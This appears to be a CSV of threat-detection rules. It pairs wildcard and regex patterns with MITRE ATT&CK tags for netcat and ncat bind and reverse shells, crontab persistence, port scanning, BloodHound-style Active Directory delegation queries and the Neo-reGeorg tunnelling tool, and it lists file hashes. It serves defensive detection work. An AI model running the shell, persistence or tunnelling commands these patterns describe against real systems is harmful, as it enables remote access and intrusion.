"*echo nc -l -p * > *.bat*",".{0,1000}echo\snc\s\-l\s\-p\s.{0,1000}\s\>\s.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*nc -l -p * -e *.bat*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\s.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*nc -l -p * -e /bin/bash*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*nc -l -p * -e cmd.exe*",".{0,1000}nc\s\-l\s\-p\s.{0,1000}\s\-e\scmd\.exe.{0,1000}","greyware_tool_keyword","nc","Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*nc -v -n -z -w1 *-*",".{0,1000}nc\s\-v\s\-n\s\-z\s\-w1\s.{0,1000}\-.{0,1000}","greyware_tool_keyword","nc","Port scanner with netcat","T1046","TA0007","N/A","N/A","Discovery","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","7","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*nc -z -v * *",".{0,1000}nc\s\-z\s\-v\s.{0,1000}\s.{0,1000}","greyware_tool_keyword","nc","netcat common arguments","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* ncat * -e /bin/bash*|crontab*",".{0,1000}\sncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\|crontab.{0,1000}","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002  - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*ncat * -p 4444*",".{0,1000}ncat\s.{0,1000}\s\-p\s4444.{0,1000}","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*",".{0,1000}MATCH\s\(c\:Computer\s\{unconsraineddelegation\:true\}\)\sRETURN\sc.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Computers in Unconstrained Delegations","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*",".{0,1000}MATCH\s\(c\:Computer\).{0,1000}\(t\:Computer\).{0,1000}\s.{0,1000}\-\[\:AllowedToDelegate\].{0,1000}\sreturn\sp.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*MATCH p=(u:User)-[:SQLAdmin]*(c:Computer) return p*",".{0,1000}MATCH\sp\=\(u\:User\)\-\[\:SQLAdmin\].{0,1000}\(c\:Computer\)\sreturn\sp.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Potential SQL Admins","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*neo4j start*",".{0,1000}neo4j\sstart.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"* neoreg.py *",".{0,1000}\sneoreg\.py\s.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*.py *--proxy socks5://*",".{0,1000}\.py\s.{0,1000}\-\-proxy\ssocks5\:\/\/.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*/neoreg.py*",".{0,1000}\/neoreg\.py.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*/Neo-reGeorg.git*",".{0,1000}\/Neo\-reGeorg\.git.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*/NeoreGeorg.java*",".{0,1000}\/NeoreGeorg\.java.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*/Neo-reGeorg/tarball*",".{0,1000}\/Neo\-reGeorg\/tarball.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*/Neo-reGeorg/zipball*",".{0,1000}\/Neo\-reGeorg\/zipball.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*/tunnel.nosocket.php*",".{0,1000}\/tunnel\.nosocket\.php.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*[Ask NeoGeorg] NeoGeorg *",".{0,1000}\[Ask\sNeoGeorg\]\sNeoGeorg\s.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*005f37654d164e5605ad7180a7af68d82da9b747e6fed34b71f6fda0883e6f74*",".{0,1000}005f37654d164e5605ad7180a7af68d82da9b747e6fed34b71f6fda0883e6f74.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*01f7bb1226ad5d0c68b39ab60014b9e9f55ef85c56be7b0faed70d67bfbc13e5*",".{0,1000}01f7bb1226ad5d0c68b39ab60014b9e9f55ef85c56be7b0faed70d67bfbc13e5.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*0a539ea3eb8e7708241c05a746cf459f027e1bb4ab54e870bbcbe63e3f7a6de9*",".{0,1000}0a539ea3eb8e7708241c05a746cf459f027e1bb4ab54e870bbcbe63e3f7a6de9.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*0f0c16e48d436603eff91f1a31043abb24df99f91a26ff8e73577d45b1152de5*",".{0,1000}0f0c16e48d436603eff91f1a31043abb24df99f91a26ff8e73577d45b1152de5.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*10a63c922b6d9bec0f3b7a8d755a01b815d81556eb93f2526db0b5a36c597d6e*",".{0,1000}10a63c922b6d9bec0f3b7a8d755a01b815d81556eb93f2526db0b5a36c597d6e.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*10d4bd7d47330656a50ba2557cd66ed93ea8a0010ef366f34b1a5e20e159297b*",".{0,1000}10d4bd7d47330656a50ba2557cd66ed93ea8a0010ef366f34b1a5e20e159297b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*11c11bef98644223da8b9e1242b046e58a04a844b6c6a6fb88b7818f296ecdb3*",".{0,1000}11c11bef98644223da8b9e1242b046e58a04a844b6c6a6fb88b7818f296ecdb3.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*12324526e79390f63e86cb9b7cebd7029d8da32fc2f73f2486517d0b451da60f*",".{0,1000}12324526e79390f63e86cb9b7cebd7029d8da32fc2f73f2486517d0b451da60f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*213ace4b0c02f038549af071ee3e0033da7e88cd8f809d257b4c9b2dc81b9f4d*",".{0,1000}213ace4b0c02f038549af071ee3e0033da7e88cd8f809d257b4c9b2dc81b9f4d.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*2fdef205058424a234864a4f77be2f451f1e52608781fb0ec10fdf867d2b4dfb*",".{0,1000}2fdef205058424a234864a4f77be2f451f1e52608781fb0ec10fdf867d2b4dfb.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*32ea3247b4e572e80e116ae9a9ffb122c0766b0cc546c6122dab07da5aefde16*",".{0,1000}32ea3247b4e572e80e116ae9a9ffb122c0766b0cc546c6122dab07da5aefde16.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*3c139c9ae721f89e61a98294cb486143ee435297beff1a6178cc7347b4ff278e*",".{0,1000}3c139c9ae721f89e61a98294cb486143ee435297beff1a6178cc7347b4ff278e.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*3d735de00aeb9535224e29d0adb6f2fefc79b7a46f76702af0d8eebcd49c1772*",".{0,1000}3d735de00aeb9535224e29d0adb6f2fefc79b7a46f76702af0d8eebcd49c1772.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*43791d1689cb309eac4e6e9748f86decf655732c3790d10ec2d30962900d52e2*",".{0,1000}43791d1689cb309eac4e6e9748f86decf655732c3790d10ec2d30962900d52e2.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*478256ef0c35f13ada15baea0dd8a7e09c40ef2ff2e0a54a83681d920b93ba8a*",".{0,1000}478256ef0c35f13ada15baea0dd8a7e09c40ef2ff2e0a54a83681d920b93ba8a.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*56bf15ccd413e54239dde9103fa9e0bdbdfd5f3788855dbfec3fbe0e6a003b98*",".{0,1000}56bf15ccd413e54239dde9103fa9e0bdbdfd5f3788855dbfec3fbe0e6a003b98.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*585ed5d6cb415cd94af39825a85dfec415f92249a8d57b5a6159537720958f42*",".{0,1000}585ed5d6cb415cd94af39825a85dfec415f92249a8d57b5a6159537720958f42.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*5a5cbc0b756cbda7a9ac64ca5a0ad33899bd3ea9ae42113389c230a164900b74*",".{0,1000}5a5cbc0b756cbda7a9ac64ca5a0ad33899bd3ea9ae42113389c230a164900b74.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*5ab3fd2f7133bb9d297ebdfda1c2cf7af45baf3149b7d29932202e2ccb79c21f*",".{0,1000}5ab3fd2f7133bb9d297ebdfda1c2cf7af45baf3149b7d29932202e2ccb79c21f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*695626bd1c10bf40379744a91ceefd71c27261b26b959d87de5c2ec74bced1a4*",".{0,1000}695626bd1c10bf40379744a91ceefd71c27261b26b959d87de5c2ec74bced1a4.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*6c4a877eb0a3bc495d7490c2f218678005a10cd6e978a92c497791b980ca8567*",".{0,1000}6c4a877eb0a3bc495d7490c2f218678005a10cd6e978a92c497791b980ca8567.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*7cde37e49b52a6ea480783c572a2fd04afcae330251ac65bbbc77b1c37faca6b*",".{0,1000}7cde37e49b52a6ea480783c572a2fd04afcae330251ac65bbbc77b1c37faca6b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*7ea80cfb998032be5b67dc614fc40087e1e36383e59a46616c9d03405c08af3c*",".{0,1000}7ea80cfb998032be5b67dc614fc40087e1e36383e59a46616c9d03405c08af3c.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*806ad9ce802f8e110440ed228eddc40d82dad33ca0feaae1530d1490edb34d90*",".{0,1000}806ad9ce802f8e110440ed228eddc40d82dad33ca0feaae1530d1490edb34d90.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*807ed1ebbac824f29a84235afe7522ddbb66bf392a7c1f5ea849a5f0aedf1d20*",".{0,1000}807ed1ebbac824f29a84235afe7522ddbb66bf392a7c1f5ea849a5f0aedf1d20.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*82fab464a4b0e1f1e284ec32370edd5090637c682ba7e7e609f2f5bb95c78c4b*",".{0,1000}82fab464a4b0e1f1e284ec32370edd5090637c682ba7e7e609f2f5bb95c78c4b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*8cc5a818d4db91362257001f7bb7995841bf3d83bc8d91e16a4329797b937cac*",".{0,1000}8cc5a818d4db91362257001f7bb7995841bf3d83bc8d91e16a4329797b937cac.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*92e23b3baec268e8b8eea8833e0d1aa5c2cf337ca20be4ceb2880d8aaaf89d4a*",".{0,1000}92e23b3baec268e8b8eea8833e0d1aa5c2cf337ca20be4ceb2880d8aaaf89d4a.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*9a468a1e3f8e645593dc25d5cb45d6b640da574e07afcc518e07eb1738a68510*",".{0,1000}9a468a1e3f8e645593dc25d5cb45d6b640da574e07afcc518e07eb1738a68510.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*9aa4b36654c9a2d7883a745ab791bcfc723ddcf793c4109529c1b8d8bbea41f0*",".{0,1000}9aa4b36654c9a2d7883a745ab791bcfc723ddcf793c4109529c1b8d8bbea41f0.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*9fc57548ab7ea8aed9b35ff5a6ceee11afd5707139f98333381fcc1442bc45aa*",".{0,1000}9fc57548ab7ea8aed9b35ff5a6ceee11afd5707139f98333381fcc1442bc45aa.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*a10a179116e873452ca3323ce17ae870ea2a240c754b696dcfd3442e7bbc16a7*",".{0,1000}a10a179116e873452ca3323ce17ae870ea2a240c754b696dcfd3442e7bbc16a7.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*a3f949008272bef1ec57519e2417f80fcdfcb633eda2c0c0e102062ffe37e62f*",".{0,1000}a3f949008272bef1ec57519e2417f80fcdfcb633eda2c0c0e102062ffe37e62f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*a7c3d70099b1df9cb3165a8b5885fa727a778f3b3526811c0b5f16c30dccc492*",".{0,1000}a7c3d70099b1df9cb3165a8b5885fa727a778f3b3526811c0b5f16c30dccc492.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
"*aa244cce94120eeaef5bb7aa7e11a129662a50ecd4a0d542ae4a425b5757daf7*",".{0,1000}aa244cce94120eeaef5bb7aa7e11a129662a50ecd4a0d542ae4a425b5757daf7.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z"
